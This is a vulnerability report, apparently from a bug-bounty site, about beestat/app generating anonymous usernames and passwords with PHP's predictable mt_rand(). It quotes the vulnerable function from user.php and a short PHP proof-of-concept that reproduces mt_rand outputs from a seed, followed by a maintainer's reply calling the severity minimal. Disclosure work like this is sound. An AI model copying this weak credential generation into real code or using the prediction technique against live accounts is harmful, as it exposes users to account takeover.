Use of Predictable Algorithm in Random Number Generator in beestat/app
Valid
Reported on
Jul 3rd 2021
✍️ Description
The random number generator implemented by mt_rand() cannot withstand a cryptographic attack.
In this case the function that generates weak random numbers is mt_rand() in user.php at line 58.
🕵️♂️ Proof of Concept
Vulnerable Code
/**
* Create an anonymous user so we can log in and have access to everything
* without having to spend the time creating an actual user.
*/
public function create_anonymous_user() {
$username = strtolower(sha1(uniqid(mt_rand(), true))); //mt_rand used
$password = strtolower(sha1(uniqid(mt_rand(), true))); //mt_rand used
$user = $this->create([
'username' => $username,
'password' => $password,
'anonymous' => 1
]);
$this->force_log_in($user['user_id']);
}
POC
#POC.php
#!/usr/bin/env php
<?php
if($argc < 3)
{
print($argv[0] . ' <seed> <n>' . "\n");
print('' . "\n");
print('Parameters:' . "\n");
print(' seed: Seed to initialize mt_rand() with' . "\n");
print(' offset: Number of calls to mt_rand() before printing the first');
print(' output' . "\n");
print('' . "\n");
print('Output:' . "\n");
print(' <offset>\'s call to mt_rand() and <offset+227>\'s call');
print(' to mt_rand()' . "\n");
exit();
}
mt_srand($argv[1]);
for($i=0;$i<$argv[2];$i++)
mt_rand();
print mt_rand() . " ";
for($i=0;$i<226;$i++)
mt_rand();
print mt_rand() . "\n";
💥 Impact
Attacker can predict the possible anonymous username and passwords with full access.
Occurrences
References
We have contacted a member of the
beestat/app
team and are waiting to hear back
2 years ago
These values are in the database to satisfy some other requirements, but this type of authentication is never used for anything. I'll mark this as valid since I could generate the random data more securely but the severity is minimal.
The fix bounty has been dropped
This vulnerability will not receive a CVE
user.php#L58-L59
has been validated
to join this conversation